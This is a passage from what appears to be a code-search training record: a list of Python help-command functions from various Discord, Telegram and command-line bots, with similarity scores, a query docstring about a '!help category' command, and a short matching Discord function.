delete <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker delete <tracker>\"),\n desc.format(\"All sqlite entries associated with <tracker> are deleted.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to delete, converted to lowercase.\")\n ]\n elif command == \"stats\":\n help_text = [\n \"Stats: show statistics for tracker(s)\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker stats <tracker> <tracker>\"),\n usage.format(\"tracker stats <tracker>\"),\n usage.format(\"tracker stats\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker stats <tracker> <tracker>\"),\n desc.format(\"Show correlation coefficient between two trackers.\"),\n \"\",\n usage.format(\"tracker stats <tracker>\"),\n desc.format(\"Display information for each weekday and entire time period.\"),\n desc.format(\"Stats included: total, mean, min, max.\"),\n \"\",\n usage.format(\"tracker stats\"),\n desc.format(\"Displays information about all trackers.\"),\n desc.format(\"Stats included: total entries, entries per tracker.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to show stats for, converted to lowercase.\")\n ]\n elif command == \"plot\":\n help_text = [\n \"Plot: show graph for tracker\",\n \"\",\n \"Usage:\",\n usage.format(\"tracker plot <tracker>\"),\n \"\",\n \"Description:\",\n usage.format(\"tracker stats <tracker>\"),\n desc.format(\"Displays graph for <tracker> from first entry to last entry.\"),\n \"\",\n \"Options:\",\n usage.format(\"<tracker>\"),\n desc.format(\"The name of the tracker to graph, converted to lowercase.\")\n ]\n else:\n error(\"Invalid command: '{}'\".format(command))\n print(\"\\n\".join(help_text))\n sys.exit(1)", "def cmd_help(self, commands=None, usage=False):\n if commands:\n usage = True\n commands = {self.approx.decmd(c.lower()) for c in commands}\n rejects = commands - self.approx.keys()\n for reject in rejects:\n self.put_pretty(\"No command named %r\" % reject)\n continue\n commands -= rejects\n if self.debug:\n assert not any(self.approx.encmd(r) in self.mod_commands for\n r in rejects)\n assert all(self.approx.encmd(c) in self.mod_commands for\n c in commands)\n if not commands:\n return\n requested = zip(commands, (self.approx[c] for c in commands))\n else:\n requested = self.approx.items()\n help = znc.CTable()\n help.AddColumn(\"Command\")\n help.AddColumn(\"Usage\" if usage else \"Description\")\n from itertools import zip_longest\n #\n for command, parser in requested:\n if usage:\n upre = \"usage: %s\" % command\n rest = (parser.format_usage()\n .replace(upre, \"\", 1)\n .replace(\"[-h] \", \"\", 1))\n desc = [l.strip() for l in rest.split(\"\\n\") if l.strip()]\n else:\n desc = [parser.description]\n for line, comm in zip_longest(desc, (command,), fillvalue=\"\"):\n help.AddRow()\n help.SetCell(\"Command\", comm)\n help.SetCell(\"Usage\" if usage else \"Description\", line)\n #\n s_line = znc.String()\n strung = []\n while help.GetLine(len(strung), s_line):\n strung.append(s_line.s)\n also = \" (<command> [-h] for details)\"\n strung[1] = strung[1].replace(len(also) * \" \", also, 1)\n self.put_pretty(\"\\n\".join(strung))", "async def help(message, *args, **kwargs):\r\n\r\n if not args:\r\n docs = {name: f.__doc__ for name, f in usercommands.items()}\r\n docs = {k:v.split(\"\\n\",1)[0] for k,v in docs.items() if v and k.startswith(prefix)}\r\n output = dictstr(docs) + f\"\\nType \\\"{prefix}help func\\\" for detailed information about func\"\r\n 
output += \"\\n\\nFunction arguments are words separated by spaces\\n ex. $sort enemydata HP\"\r\n output += \"\\nKeyword arguments have the format: key=value\\n no spaces, unless value is in quotes\"\r\n output += \"\\n\\nDataTables:\"\r\n for name in DataTables:\r\n output += \"\\n \" + name\r\n if name == \"enemydata-h\": output += \" (hard-mode stats)\"\r\n await reply(message, f\"```{output}```\")\r\n return\r\n await reply(message, f\"```{inspect.getdoc(usercommands['$'+args[0]])}```\")", "def quick_test():\n do_command('Help: Command=Help')\n do_command('Help: Command=\"GetInfo\"')\n #do_command('SetPreference: Name=GUI/Theme Value=classic Reload=1')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(messages.HELP_TEXT)", "async def help(ctx, *, command: str = None):\n try:\n if command is None:\n p = await HelpPaginator.from_bot(ctx)\n else:\n entity = bot.get_cog(command)\n if entity is None:\n clean = command.replace('@', '@\\u200b')\n return await ctx.send(f'Command or category \"{clean}\" not found.')\n elif isinstance(entity, commands.Command):\n p = await HelpPaginator.from_command(ctx, entity)\n else:\n p = await HelpPaginator.from_cog(ctx, entity)\n\n await p.paginate()\n except Exception as e:\n await ctx.send(e)", "async def help(self, msg, *args, intro=None):\n sudo = Guard.allow_sudo(msg)\n if intro is not None:\n intro = f'{intro.strip()} '\n else:\n intro = ''\n if msg.channel.type == discord.ChannelType.private:\n nick = '@DayRInfo'\n else:\n nick = f'@{msg.channel.guild.me.nick}'\n content = f'{intro}I understand the following commands (tag me at the start of the message):\\n'\n for command, (args, desc, enabled, delay) in Controller.commands.items():\n if not sudo and not enabled:\n continue\n if args:\n args = f' {args.strip()}'\n if desc:\n desc = f'\\n\\t{desc}'\n content = f'{content}`{Controller.HELP_KEY}{command}{args}`{desc}\\n'\n content = f'{content}----------\\n'\n content = f'{content}• Also, if you tag this bot ({nick}) on a message containing a link to the interactive Day R map 🗺️ with a location URL, I will send you a snapshot of the location.\\n'\n content = f'{content}• React with ❌ to any of my messages to delete it (if I still remember that it was my message). You can only delete my messages that are directed to you.'\n await msg.author.send(**{\n 'content': content,\n })\n await msg.channel.send(**{\n 'content': 'Command list sent via DM!',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n 'delete_after': 3,\n })", "def do_help():\n return True, \"\"\"I can understand these commands:\nOFF - Shut down robot\nHELP - provide information about commands\nFORWARD - move forward by specified number of steps, e.g. 'FORWARD 10'\nBACK - move backward by specified number of steps, e.g. 
'BACK 10'\nRIGHT - turn right by 90 degrees\nLEFT - turn left by 90 degrees\nSPRINT - sprint forward according to a formula\n\"\"\"", "def help(update, context):\n update.message.reply_text(\"\"\"THESE ARE THE COMMANDS\n /hi\n /gokul\n /bala\n /competition\n /form\n \"\"\")", "async def help(self, ctx, *, command: str = None):\n try:\n if command is None:\n p = await HelpPaginator.from_bot(ctx)\n else:\n entity = self.bot.get_cog(command) or self.bot.get_command(command)\n\n if entity is None:\n clean = command.replace('@', '@\\u200b')\n return await ctx.send(f'Command or category \"{clean}\" not found.')\n elif isinstance(entity, commands.Command):\n p = await HelpPaginator.from_command(ctx, entity)\n else:\n p = await HelpPaginator.from_cog(ctx, entity)\n\n await p.paginate()\n except Exception as e:\n await ctx.send(e)", "def print_help(self):\n print self.get_help()", "def helpme(self):\n\n print(\"{}{}{}\".format(' ', 'Commands', ' '))\n print(\"{}{}{}\".format(' ', '--------', ' '))\n print(\"{} {} {}\".format('help ', '|', 'Display all usable commands'))\n print(\"{} {} {}\".format('look ', '|', 'Explore the room to find current location, exits and potential items.'))\n print(\"{} {} {}\".format('go ', '|', 'The prefix required to navigate your player.'))\n print(\"{} {} {}\".format('get ', '|', 'The prefix for picking up items.'))\n print(\"{} {} {}\".format('drop ', '|', 'The prefix for dropping items.'))\n print(\"{} {} {}\".format('inv ', '|', 'Displays the player inventory'))\n print(\"{} {} {}\".format('health ', '|', 'Displays player health'))\n print(\"{} {} {}\".format('eat ', '|', 'Allows the player to use consumables to gain health'))\n print(\"{} {} {}\".format('equip ', '|', 'Equip a weapon in your inventory'))\n print(\"{} {} {}\".format('unequip', '|', 'Unequip a current weapon'))\n print(\"{} {} {}\".format('attack ', '|', 'Allows the player to attack a non-player'))\n print(\"{} {} {}\".format('push ', '|', 'Returns NPC to spawn'))\n print(\"{} {} {}\".format('save ', '|', 'Save current player progress'))\n print(\"{} {} {}\".format('load ', '|', 'Load a previous character'))", "def initialize_help_commands(self) -> None:\n\n @self.command(name=\"help\")\n @logger(\"all\")\n async def help_command(ctx, *args):\n if len(args) == 0:\n await ctx.message.channel.send(indie_help.summary())\n else:\n await ctx.message.channel.send(indie_help.specific(args))", "def do_help(self, line):\n Cmd.do_help(self, line)", "def channel_help(message):\n message.reply(Strings['HELP'].format(config.HELP_URL))" ]
[ "0.8511808", "0.8454938", "0.83023393", "0.82100123", "0.8172162", "0.8119534", "0.8045609", "0.7997151", "0.79934657", "0.79888207", "0.7869247", "0.7839074", "0.7831564", "0.7807893", "0.7801458", "0.77975965", "0.77936643", "0.7725134", "0.76936215", "0.7667932", "0.7667932", "0.76497036", "0.76497036", "0.7628276", "0.7610771", "0.75922734", "0.75838995", "0.758352", "0.7563916", "0.7556451", "0.755237", "0.75399286", "0.7539473", "0.7525681", "0.75214773", "0.7514472", "0.75070816", "0.7498093", "0.748434", "0.7472967", "0.745708", "0.7456372", "0.7448633", "0.7441096", "0.74235225", "0.742008", "0.741299", "0.74123985", "0.74046856", "0.7401341", "0.73991734", "0.73990095", "0.73945934", "0.73850703", "0.7384522", "0.73833996", "0.7372972", "0.7372972", "0.73705924", "0.7369859", "0.73683614", "0.73671097", "0.73603016", "0.73593056", "0.7333431", "0.733177", "0.733177", "0.733177", "0.733177", "0.73265743", "0.7319092", "0.73185515", "0.7303384", "0.72921866", "0.7282114", "0.7278147", "0.72738814", "0.72723234", "0.7265674", "0.726526", "0.72568154", "0.7256574", "0.72528225", "0.72528225", "0.7251022", "0.72443396", "0.72423077", "0.72289395", "0.7228725", "0.7226511", "0.7218349", "0.7213249", "0.7212109", "0.72093403", "0.72060156", "0.71885115", "0.71863073", "0.7174839", "0.7161957", "0.71515167", "0.7147234" ]
0.0
-1
Type !help command for additional info on a command. You can also type !help category for additional info on a category. For example, type !help Level (If you have the level plugin enable!)
async def category(self,ctx):
    await ctx.send("Yes this is a category.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def help_help(self):\n print(\"List commands or print details about a command\")", "def command_help(self, command):\n self.commands[command].command_help()", "def _help(self):\n self.onecmd('help')", "def cmd_help(args):", "def help():\n \n pass", "def help():", "def command_help(self, *args, **kwargs):\n print(\"Commands available:\\n\")\n for name in dir(self):\n if not name.startswith(\"command_\"):\n continue\n name_clean = name[len(\"command_\"):]\n print(\"%s:\\n - %s\\n\" % (name_clean, getattr(self, name).__doc__.strip()))", "def do_command_help(self, command):\n summary = self.base.commands[command].get_summary()\n usage = self.get_command_usage(command)\n description = self.base.commands[command].get_description()\n sys.stdout.write('%s\\n%s' % (summary, usage))\n if description != None:\n sys.stdout.write('Arguments Description:\\n%s\\n' %\n (description, ))", "def help():\n print(UI.HELP)", "def help(self):\r\n self._short_help(None, None, None, None)", "def cmd_help(ctx):\n echo(ctx.parent.get_help())", "def show_help():\n pass", "async def help(self, ctx):\n self.log_command_call(\"help\", ctx.message)\n await ctx.send(HELP_TEXT)\n embed_output = create_embed(description=MORE_INFO_TEXT)\n await ctx.send(embed=embed_output)", "async def _help(ctx, *, command_name: str=None):\n if command_name:\n command = bot.get_command(command_name)\n if not command:\n return await ctx.send(\"No such command!\")\n return await ctx.send(f\"```\\n{ctx.prefix}{command.name} {command.signature}\\n\\n{command.help or 'Missing description'}```\")\n description = []\n for name, cog in bot.cogs.items():\n entries = [\" - \".join([cmd.name, cmd.short_doc or \"Missing description\"]) for cmd in cog.get_commands() if await _can_run(cmd, ctx) and not cmd.hidden]\n if entries:\n description.append(f\"**{name}**:\")\n description.append(\"• \" + \"\\n• \".join(entries))\n await ctx.send(embed=discord.Embed(description=\"\\n\".join(description), color=ctx.me.color))", "def help(command=None):\n if command is None: \n # print first line of docstring\n for cmd in commands:\n ds = commands[cmd].__doc__.split('\\n')[0]\n print \"%-16s %s\" % (cmd,ds)\n else:\n print commands[command].__doc__", "def help(self):", "def help(self):", "def help(self):\n pass", "def help(self):\n pass", "def command_help(self):\n print(\"Command \", self)\n print(\"\\t\\thelp (Get help for command)\")\n\n params = self.params.copy()\n del params[\"help\"]\n\n if len(params) == 0:\n print(\"This command has no parameters\")\n return\n\n print(\"Parameters:\")\n for info in params.values():\n print(\" %s\" % info.get_basic_info())\n description = info.get_desc()\n if description != \"\":\n print(textwrap.fill(description,\n initial_indent=\" \",\n subsequent_indent=\" \",\n width=70))", "def help():\n print \"Help comes to those who ask\"", "def help_command(server, output, conf):\n server.tell(output.name, 'Available commands:')\n for key in COMMANDS.keys():\n cmd_func = COMMANDS[key]\n if cmd_func.__doc__:\n server.tell(output.name, '%s: %s' % (key[1:], cmd_func.__doc__))\n else:\n server.tell(output.name, key[1:])\n return", "def help(ctx):\n click.echo(ctx.parent.get_help())", "def help(ctx, topic, **kw):\n # The help command implementation is taken from\n # https://www.burgundywall.com/post/having-click-help-subcommand\n if topic is None:\n click.echo(ctx.parent.get_help())\n else:\n click.echo(main.commands[topic].get_help(ctx))", "def print_generic_help():\r\n print ART_NAME\r\n print 'Version {1}\\nby {2}'.format(NAME, 
VERSION, AUTHOR)\r\n print DESCRIPTION\r\n tools = sorted(AvailableCommands.commands.keys(), key=lambda v: v.upper())\r\n # Do not show CUSTOM command in the help\r\n tools.remove('CUSTOM')\r\n tools.remove('CUSTOM_NO_OUTPUT')\r\n print '\\n\\nSupported tools are:\\n{0}'.format('\\n'.join(tools))\r\n print '\\nHint: Check tool specific help with --help <tool_name>\\n'", "def help_command(update, context):\n update.message.reply_text('Help!')", "async def help(self, *args, **kwargs):\n if len(args) == 0:\n return self.help.__doc__\n docs = []\n for command in args:\n if command in self.user_special_bang_set:\n docs.append(self.user_special_bang_set[command].bang_skill.__doc__)\n elif command in self.control_bang_set:\n docs.append(self.control_bang_set[command].bang_skill.__doc__)\n\n return \"| \".join(docs)", "def help_command(update, context):\n update.message.reply_text('Let me help you. \\r\\n /help print this help \\r\\n /safety prints safety instructions \\r\\n /play start the game\\r\\n /joingroup Join CTF tg group')", "def command_help(self, bot, update):\n\n messages = [\n 'Available commands:',\n '/who - Who is Myles?',\n '/where - Where is Myles?',\n '/tweet - What was the last tweet Myles sent?',\n '/photo - What was the last Instagram photo Myles took?',\n '/web - Where can I find Myles on the interwebs?',\n ]\n\n self.send_messages(bot, update, messages)", "def do_help(self, command_name):\n if not command_name:\n print _PVBlotInterp.__doc__\n print \"The following commands are supported:\"\n print \" \",\n blotish_commands = self._blotish_commands.keys()\n blotish_commands.sort()\n for c in blotish_commands:\n print c,\n print\n print\n print \"For more information on any command, try help <command>.\"\n return\n try:\n command = self.get_unique_command(command_name)\n print command.__doc__\n except blotish.BlotishError, err:\n blot_common.print_blot_error(err)", "def printhelp():", "def display_help(self):\n pass", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help(self, msg=None):\n\n # Print the message if given.\n if not msg == None:\n print str(msg) + \"\\n\"\n\n # Display the list of commands, in the alphabetical order.\n print \"Use one of the following commands:\"\n for action in sorted(self.actions.keys()):\n info = self.actions[action]\n joined_oblig = ' '.join(info['required'])\n if len(info['additional']) > 0:\n add = [\"<%s>\" % x for x in info['additional']]\n joined_add = '[' + ' '.join(add) + ']'\n else:\n joined_add = ''\n print \"\\t* %s %s %s\" % (action, joined_oblig, joined_add)", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text('Help!')", "def help(self):\n\t\treturn", "async def do_help(self, arg):\n if arg:\n if arg in self._commands:\n _, doc = self._commands[arg]\n print(doc)\n else:\n self.error('No command {}'.format(arg))\n else:\n print('Valid commands:')\n for c in self._commands:\n print(' ' + c)", "def 
print_specific_help(tool_name):\r\n if tool_name not in AvailableCommands.commands:\r\n print 'Command is not supported: {0}'.format(tool_name)\r\n return\r\n cmd = AvailableCommands.commands[tool_name]\r\n\r\n print 'Usage of {0}:'.format(cmd.name)\r\n print '\\nAccepted input types:\\n{0}'.format(str(list(cmd.input_types)))\r\n print '\\nOutput types:\\n{0}'.format(str(cmd.output_types))\r\n print '\\nMandatory arguments:\\n{0}'.format(str(cmd.user_mandatory_args))\r\n print '\\nOptional arguments:\\n{0}'.format(str(cmd.user_optional_args))\r\n print '\\nParallelizable:\\n{0}'.format(str(cmd.parallelizable))\r\n print '\\nAdditional description:\\n{0}'.format(str(cmd.help_description))\r\n print ''", "def help(cmd, cmdArgs):\n global commandDict\n retInfo = []\n if len(cmdArgs) > 0:\n #return help on a single function\n if cmdArgs[0] in commandDict.keys():\n return commandDict[cmdArgs[0]].__doc__\n\n #else, return general info\n retInfo = ['pypeople: A command line tool for vCard management',\n 'Version:' + __version__,\n 'Available Commands:']\n #fill in more info here\n for cmdName in commandDict.keys():\n cmdFunc = commandDict[cmdName]\n cmdDoc = str(cmdName) + ': ' + str(cmdFunc.__doc__) if cmdFunc.__doc__ is not None else 'Undocumented Function'\n retInfo.append('\\t' + cmdDoc)\n\n return '\\n'.join(retInfo)", "async def help(self, ctx, *, command_name: str=None):\n bot_prefix = '@Randy '\n # Shortcut to command search\n if command_name is not None:\n return await ctx.invoke(self.cmd('help command'), cmd_name=command_name)\n\n em = discord.Embed(title='Help',\n description='**Permissions:** The permissions required to function :-\\n'\n '`Send Messages`, `Manage Messages`, `Embed Links`\\n'\n '--\\nTo get help or more information on a specific command, use:\\n'\n '`{bot_prefix}help <command name>`\\n'\n '--\\nRead my messy code [here](http://github.com/xKynn/RandomRumble)'\n '--\\nIf you like my work and would like to help me, '\n 'Ko-Fi/Paypal: [Link](https://ko-fi.com/D1D6EXXV)\\n',\n color=self.color)\n\n em.set_footer(text=\"Contact me at Demo#7645\")\n\n # This can't go in the init because help isn't loaded last & thus misses some commands\n em.add_field(name=\"Commands\", value=' • '+'\\n • '.join(f\"***{c.name}*** - {c.short_doc}\" for c in self.bot.commands if\n c.name not in ['pob', 'link', 'convert']))\n try:\n await ctx.send(embed=em)\n except:\n await ctx.send(\"`Embed Links` permission is required to see the help!\")", "def test_cli_help(self):\n output = self.update_command('-h')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text(\"These are the list of commands supported. \\n\\n /deadlines. \\n\\n \"\n \"Hey! 
I am still being enhanced, more features to come...!\")", "def command_help(args):\n\tprint_usage()\n\treturn 0", "def help_command(update: Update) -> None:\n #update.message.reply_text('Help!')", "async def do_help():\n\n if len(message.content.split()) > 1:\n for i in cmd_dict:\n if message.content.split()[1] == i:\n await bot.send_message(c, f'Help for {i}: {cmd_dict[i].__doc__}')\n return\n\n cmdstr = 'Commands: '\n for i in cmd_dict:\n cmdstr += '{}, '.format(i)\n await bot.send_message(c, cmdstr)", "def get_command_help(self, module_name, command_name):\r\n command = self.env.get_command(module_name, command_name)\r\n\r\n default_format = 'raw'\r\n if sys.stdout.isatty():\r\n default_format = 'table'\r\n\r\n arg_doc = command.__doc__\r\n\r\n if 'confirm' in command.options:\r\n arg_doc += \"\"\"\r\nPrompt Options:\r\n -y, --really Confirm all prompt actions\r\n\"\"\"\r\n\r\n if '[options]' in arg_doc:\r\n arg_doc += \"\"\"\r\nStandard Options:\r\n --format=ARG Output format. [Options: table, raw] [Default: %s]\r\n -C FILE --config=FILE Config file location. [Default: ~/.softlayer]\r\n --debug=LEVEL Specifies the debug noise level\r\n 1=warn, 2=info, 3=debug\r\n --timings Time each API call and display after results\r\n --proxy=PROTO:PROXY_URL HTTP[s] proxy to be use to make API calls\r\n -h --help Show this screen\r\n\"\"\" % default_format\r\n return arg_doc.strip()", "def print_help(self):\n\n print((\"Help is not defined for command \" + self.command))", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Laughybot\\n\\n VERSION\\n 0.1 \\n\\nUSAGE\\n /{command} : Entrer une commande parmi celles disponibles\\n\\nCOMMADES\\n/joke => recherche une blague sur la toile\\n/start => Affiche le message d'accueil\\n/help => Affiche l'aide\")", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(messages.HELP_TEXT)", "def get_help(self) -> None: \n print(messages.get_help())", "def Help(topic=None):\n\n if not topic:\n print \"Avaliable commands are: \"\n print \"\\n\".join(map(lambda x:\" \"*3+x, filter(lambda c:c!=\"help\", commands)))\n print \"Type help command to get help with a specific command.\"\n\n elif topic in commands:\n print \"Help for %s:\"%topic\n print commands[topic].__doc__", "def dispatch_help(args):\n command = args.subcommand\n if command is None:\n command = 'help'\n args.parsers[command].print_help()\n\n cmd_func = getattr(EtcMaint, 'cmd_%s' % command, None)\n if cmd_func:\n lines = cmd_func.__doc__.splitlines()\n print('\\n%s\\n' % lines[0])\n paragraph = []\n for l in dedent('\\n'.join(lines[2:])).splitlines():\n if l == '':\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))\n print()\n paragraph = []\n continue\n paragraph.append(l)\n if paragraph:\n print('\\n'.join(wrap(' '.join(paragraph), width=78)))", "def help(self) -> str:\n\t\treturn None", "async def send_command_help(self, command):\n ctx = self.context\n embed = discord.Embed(title=command.name.upper(), description=command.description, color=discord.Color.green())\n alias = command.aliases\n if alias:\n embed.add_field(name=\"Aliases\", value=\", \".join(alias), inline=False)\n if command.usage != None:\n embed.add_field(name=\"How to use:\", value=f'`{command.usage}`')\n\n await ctx.reply(embed=embed)", "def _help():\n text = \"\"\"\n```\nUsage: @bot [command] (message)\n\n*Commands*:\n \n add Adds specified users to notify list | To add yourself use key 'myself'\n list Lists users on 
notify list\n remove Removes specified users from notify list | To remove yourself use key 'myself'\n help This help\n\n > Obs: All commands are optional\n\n*Examples*:\n\n @bot add myself @Fulano <= Will add yourself and @Fulano in list.\n @bot this a messge test <= Send 'this a messge test' to all list.\n @bot remove myself @Fulano <= Remove yourself and @fulano from list.\n\n```\n\"\"\"\n return text", "def do_help(self, args): \n if args.command:\n if len(args.command) > 1:\n command = args.command[0] +\"-\" + args.command[1]\n else:\n command = args.command[0]\n if command in self.subcommands:\n self.subcommands[command].print_help()\n else:\n print((\"'%s' is not a valid subcommand\") %\n args.command)\n else:\n self.parser.print_help()", "def print_help():\n\tprint(\"Help text\")", "def help(update, context):\n update.message.reply_text(\"\"\"usage \n /bus <bus name> or /bus <bus name> <stop name>\n /addstop <stop name> <stop code>\n /delstop <stop name>\n /showstops\n /help\n \"\"\")\n\n # log info\n logger.info(\"help used username:{0}\".format(update.message.from_user.username))", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def print_help(self):\n print self.get_help()", "def do_help(self, line):\n Cmd.do_help(self, line)", "def show_help(self):\n self.slack.reply('\\n\\n'.join(self.help_lines))", "def help(self, args):\n print('No commands available for this consumer')", "def help_util():\r\n for cmd, f in COMMANDS.items():\r\n print(\"POM \" + cmd + \":\")\r\n print(f.__doc__.lstrip(\"\\n\"))", "def help(self) -> str:\n raise NotImplementedError", "def do_help(self, arg):\n if arg:\n # Getting help for a specific command\n funcname = self._func_named(arg)\n if funcname:\n # No special behavior needed, delegate to cmd base class do_help()\n cmd.Cmd.do_help(self, funcname[3:])\n else:\n # Show a menu of what commands help can be gotten for\n self._help_menu()", "async def help_command(self, ctx, *, cmd_name: str=None):\n bot_prefix = '@Randy '\n # Get command object\n cmd_obj = self.cmd(cmd_name)\n\n # Handle no command found\n if cmd_obj is None:\n return await ctx.error(f'Command {cmd_name} not found')\n em = discord.Embed(title=cmd_obj.name, description=cmd_obj.help, color=self.color)\n\n # Input aliases and parameters to embed\n if cmd_obj.aliases:\n em.add_field(name='Aliases', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.aliases]))\n if cmd_obj.clean_params:\n em.add_field(name='Parameters', value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.clean_params]))\n\n # Handle group commands\n if isinstance(cmd_obj, commands.core.Group):\n em.add_field(name='Group commands',\n value='\\n'.join([f'\\u2022 {x}' for x in cmd_obj.commands]),\n inline=False)\n\n # Add usage last\n em.add_field(name='Usage',\n value=f'```{bot_prefix}\\u200b{cmd_name} '\n f'{\" \".join([f\"<{x}>\" for x in cmd_obj.clean_params])}```',\n inline=False)\n\n await ctx.send(embed=em)", "def show_help():\n print('\\n' + Colors.BLACK_ON_WHITE +\n 'track: Input info for daily tracking' + Colors.NORMAL + '\\n'\n ' * Mood\\n' +\n ' * Short Daily Summary\\n' +\n ' * Accomplishments\\n' +\n ' * Long Journal Entry\\n' +\n \" * Tomorrow's Most Important Task\\n\" +\n '\\n' +\n 'Usage: track.py [options]\\n'\n '\\n' +\n 'Options:\\n' +\n ' [none] Input and record daily tracking\\n' 
+\n ' y Input and record tracking for previous day\\n' +\n ' ! Print random daily entry\\n' +\n ' accs Print all recent accomplishments\\n' +\n ' help Print this help menu\\n' +\n ' mood Print average mood using past entries\\n' +\n ' overviews Print headers of all recent entries.\\n')", "def do_help(self, message):\r\n\t\tcommands = [command[3:] for command in dir(self) if command.startswith('do_')]\r\n\t\t# self.trace(f'Help: {\", \".join(commands)}')\r\n\r\n\t\tfor command in commands:\r\n\t\t\tmethod = getattr(self, f'do_{command}')\r\n\t\t\tcommand_help = getattr(method, '__doc__')\r\n\t\t\tif command_help:\r\n\t\t\t\tself.trace(f'{command}: {command_help}')", "def get_help(self,command):\n if \"help\" in self.commands[command]:\n return self.commands[command][\"help\"]\n else:\n return \"No help defined for this command.\"", "def HelpCommand(self, unused_args, unused_sub_opts=None, unused_headers=None,\n unused_debug=None):\n self.OutputUsageAndExit()", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def printHelp(self,):\n print man\n return 0", "def help_description():\n pass", "def help(self, cmd=\"\", *, fail=\"\"):\n class_dict = dict(type(self).__dict__)\n # Add this function to class, so that when subclassing,\n # help for help is found\n class_dict.update({\"help\": self.help})\n if cmd.startswith(self.predicate):\n # Strip predicate\n cmd = cmd[len(self.predicate) :]\n # Check that command exists and is not\n # private, protected or special method\n if (not cmd.startswith(\"_\")) and cmd in class_dict.keys():\n item = class_dict[cmd]\n if callable(item):\n if item.__doc__:\n return \"Help on command '{}':\\n. {}\".format(\n cmd, \"\\n. 
\".join(cleandoc(item.__doc__).split(\"\\n\"))\n )\n return \"No help on command '{}'\".format(cmd)\n # If no cmd given or wrong cmd given, return commands\n commands = []\n for key, value in class_dict.items():\n if not key.startswith(\"_\"):\n if callable(value):\n commands.append(key)\n msg = (\n \"Commands:\\n {}\".format(\", \".join(commands))\n + \"\\n for more help on command, use \"\n + \"{}help command\".format(self.predicate)\n )\n if fail:\n msg = fail + \"\\n\" + msg\n return msg", "def help(self):\n return None", "def help():\n version()\n print(\"USAGE: python3 notes.py [COMMAND]\")\n print(\"COMMAND:\")\n help_dict = {\n \"help\": \"Prints out the help text.\",\n \"version\": \"Prints out the version.\",\n \"init\": \"Initializes a new set of notes.\",\n \"modify\": \"Modify the current set of notes.\",\n }\n help_dict = OrderedDict(sorted(help_dict.items()))\n for entry in help_dict:\n print((\" \" + entry).ljust(10), help_dict[entry])", "async def help(self, msg, *args, intro=None):\n sudo = Guard.allow_sudo(msg)\n if intro is not None:\n intro = f'{intro.strip()} '\n else:\n intro = ''\n if msg.channel.type == discord.ChannelType.private:\n nick = '@DayRInfo'\n else:\n nick = f'@{msg.channel.guild.me.nick}'\n content = f'{intro}I understand the following commands (tag me at the start of the message):\\n'\n for command, (args, desc, enabled, delay) in Controller.commands.items():\n if not sudo and not enabled:\n continue\n if args:\n args = f' {args.strip()}'\n if desc:\n desc = f'\\n\\t{desc}'\n content = f'{content}`{Controller.HELP_KEY}{command}{args}`{desc}\\n'\n content = f'{content}----------\\n'\n content = f'{content}• Also, if you tag this bot ({nick}) on a message containing a link to the interactive Day R map 🗺️ with a location URL, I will send you a snapshot of the location.\\n'\n content = f'{content}• React with ❌ to any of my messages to delete it (if I still remember that it was my message). 
You can only delete my messages that are directed to you.'\n await msg.author.send(**{\n 'content': content,\n })\n await msg.channel.send(**{\n 'content': 'Command list sent via DM!',\n 'reference': msg.to_reference(),\n 'mention_author': True,\n 'delete_after': 3,\n })", "def print_help_info(self, global_options):\r\n usage = ['',\"Type '%s help <subcommand>' for help on a specific subcommand.\" % self.prog_name,'']\r\n usage.append('Available subcommands:')\r\n commands = self.get_commands(global_options).keys()\r\n commands.sort()\r\n for cmd in commands:\r\n usage.append(' %s' % cmd)\r\n return '\\n'.join(usage)", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Usage: Basic example to make face recognition' +\n 'Just upload foto, pls.')", "def show_help():\n messagebox.showinfo(title='How to Use', message=\"It's really easy.\")", "def helpme(self):\n\n print(\"{}{}{}\".format(' ', 'Commands', ' '))\n print(\"{}{}{}\".format(' ', '--------', ' '))\n print(\"{} {} {}\".format('help ', '|', 'Display all usable commands'))\n print(\"{} {} {}\".format('look ', '|', 'Explore the room to find current location, exits and potential items.'))\n print(\"{} {} {}\".format('go ', '|', 'The prefix required to navigate your player.'))\n print(\"{} {} {}\".format('get ', '|', 'The prefix for picking up items.'))\n print(\"{} {} {}\".format('drop ', '|', 'The prefix for dropping items.'))\n print(\"{} {} {}\".format('inv ', '|', 'Displays the player inventory'))\n print(\"{} {} {}\".format('health ', '|', 'Displays player health'))\n print(\"{} {} {}\".format('eat ', '|', 'Allows the player to use consumables to gain health'))\n print(\"{} {} {}\".format('equip ', '|', 'Equip a weapon in your inventory'))\n print(\"{} {} {}\".format('unequip', '|', 'Unequip a current weapon'))\n print(\"{} {} {}\".format('attack ', '|', 'Allows the player to attack a non-player'))\n print(\"{} {} {}\".format('push ', '|', 'Returns NPC to 